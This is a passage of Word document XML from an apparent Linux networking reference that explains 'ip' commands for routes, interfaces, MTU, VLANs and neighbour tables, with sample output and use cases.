        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>src 192.168.1.100</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t>: Source IP to use for outgoing packets on this route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332EDF89" w14:textId="350B6E91" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add static route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28425ADF"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sudo ip route add 10.0.0.0/8 via 192.168.1.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A4D729" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Route traffic to private networks through specific gateway.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DEF193" w14:textId="67192411" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:lastRenderedPageBreak/>
        <w:t>Delete route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE6584A"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sudo ip route del 10.0.0.0/8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D5D816" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Remove incorrect or outdated routing entries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFAF97" w14:textId="6549BC15" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Show specific interface details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20900767"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ip addr show dev eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597C03E3" w14:textId="77777777" w:rsidR="001D111D" w:rsidRPr="0017552F" w:rsidRDefault="001D111D" w:rsidP="001D111D">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F9B66"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2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10194C5C"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xml:space="preserve">    link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359310A8"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xml:space="preserve">    inet 192.168.1.100/24 brd 192.168.1.255 scope global dynamic eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F2CF73"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xml:space="preserve">       valid_lft 86392sec preferred_lft 86392sec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0D677D"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xml:space="preserve">    inet 192.168.1.50/24 scope global secondary eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04916929" w14:textId="3047F1CA"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xml:space="preserve">       valid_lft forever preferred_lft forever</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC81153" w14:textId="56877C24" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2395706A" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: eth0 (index 2) with full broadcast/multicast capabilities. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E85884" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Status</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: UP and operational with physical link active. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C46AF04" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MTU</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: 1500 bytes maximum transmission unit. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7135431F" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MAC address</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: 52:54:00:12:34:56 hardware identifier. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4222E968" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IPv4</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: 192.168.1.100/24 dynamic address (DHCP, expires in 86392 seconds). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A5BAD2" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IPv6</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: fe80::5054:ff:fe12:3456/64 link-local address (permanent). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27EB419F" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Address scopes</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: Global (routable) vs link-local (subnet only). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549FA176" w14:textId="185785D5" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="131"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interface details</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t>: Complete network configuration for single interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078C233" w14:textId="2681978C" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Focus on single interface configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BEF8D1" w14:textId="2E911C22" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Bring interface up/down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105C3F0C"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sudo ip link set eth0 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DEB7006"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sudo ip link set eth0 down</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3566A8" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Enable/disable network interfaces without rebooting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AFF1A7" w14:textId="0C0843BB" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Change interface MTU</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D67D78"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sudo ip link set eth0 mtu 9000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46982A5A" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Enable jumbo frames for high-performance networking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569D9CA8" w14:textId="161005FD" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Show interface statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778FAA53"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ip -s link show eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251E6EB1" w14:textId="77777777" w:rsidR="001D111D" w:rsidRPr="001D111D" w:rsidRDefault="001D111D" w:rsidP="001D111D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001D111D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B88C9BC"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2: eth0: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP mode DEFAULT group default qlen 1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B02EA6"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link/ether 52:54:00:12:34:56 brd ff:ff:ff:ff:ff:ff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FA9228"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xml:space="preserve">    RX: bytes  packets  errors  dropped overrun mcast   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C6127A"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xml:space="preserve">    15234567   12845    0       0       0       342     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABF953C"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xml:space="preserve">    TX: bytes  packets  errors  dropped carrier collsns </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35168CED" w14:textId="664F49AA"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1234567    8967     0       0       0       0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12124FF4" w14:textId="4382D263" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D79E0A0" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interface info</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: eth0 with 1500 MTU and UP status. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A3DB0B" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RX statistics</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: Received 15.2MB in 12,845 packets, 0 errors, 342 multicast. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D307C9" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TX statistics</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: Transmitted 1.2MB in 8,967 packets, 0 errors. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DF3DAE8" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error counters</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: All error types (dropped, overrun, carrier, collisions) at 0. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFB77D2" w14:textId="77777777" w:rsidR="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="00BC571A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Performance metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t xml:space="preserve">: Clean traffic flow with no transmission problems. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CD49CD" w14:textId="0B597B00" w:rsidR="00BC571A" w:rsidRPr="00BC571A" w:rsidRDefault="00BC571A" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="132"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC571A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Traffic analysis</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC571A">
        <w:t>: More received than transmitted data (typical client behavior)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D86356D" w14:textId="70B60608" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Monitor packet counts, errors, and dropped packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00BC796F" w14:textId="5699621F" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add VLAN interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598B3AD7" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F"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p link add link eth0 name eth0.100 type vlan id 100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5D27B1" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F"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lastRenderedPageBreak/>
        <w:t>sudo ip link set eth0.100 up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C89196" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Create VLAN-tagged interfaces for network segmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E85EAA0" w14:textId="1D01BF07" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Show neighbor table (ARP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286F2BD"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ip neigh show</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B04D1" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> View MAC address mappings and detect network issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D949CB1" w14:textId="4E6CE90B" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Flush routing table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294C192E"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sudo ip route flush table main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="676EBC3F" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Remove all routes for network reconfiguration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E38A21E" w14:textId="0D3F1DA3" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Show routing table for specific destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB01B95"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ip route get 8.8.8.8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70872018" w14:textId="327DBF20" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BBF30F" w14:textId="1664A2A2" w:rsidR="001B6F7F" w:rsidRPr="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7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B6F7F">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8.8.8.8 via 192.168.1.1 dev eth0 src 192.168.1.100 uid 1000 cache</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091D01EB" w14:textId="3BF160EC" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="0017552F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C6D39F" w14:textId="5703F8F1" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.8.8.8</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Target destination (Google DNS server). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F5FEE2" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>via 192.168.1.1</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Next hop gateway router to reach destination. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6768336F" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dev eth0</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Outgoing network interface for this route. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C10D0" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>src 192.168.1.100</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Source IP address used for packets to this destination. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DACB4A9" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>uid 1000</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: User ID that performed the route lookup. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36515F55" w14:textId="77777777" w:rsidR="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="001B6F7F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cache</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t xml:space="preserve">: Route entry cached in kernel for faster subsequent lookups. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C5191F" w14:textId="1EC8FD02" w:rsidR="001B6F7F" w:rsidRPr="001B6F7F" w:rsidRDefault="001B6F7F" w:rsidP="0017552F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="133"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001B6F7F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Route resolution</w:t>
      </w:r>
      <w:r w:rsidRPr="001B6F7F">
        <w:t>: Shows exact path packets will take to reach specific destination</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681F164B" w14:textId="25A97200" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Verify which route will be used for specific destinations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA71C22" w14:textId="5C21B1C4" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add temporary IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EEF282"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sudo ip addr add 192.168.1.200/24 dev eth0 valid_lft 3600 preferred_lft 1800</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDA3ADE" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="0017552F">
        <w:t xml:space="preserve"> Add IP address with automatic expiration for testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38114817" w14:textId="5582DF5E" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="004F482C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="0017552F">
        <w:t>Add static route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A07747F"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sudo ip route add 10.0.0.0/24 via 192.168.1.1 dev eth0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0CF351" w14:textId="77777777" w:rsidR="0017552F" w:rsidRPr="0017552F" w:rsidRDefault="0017552F" w:rsidP="0017552F">
      <w:r w:rsidRPr="0017552F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
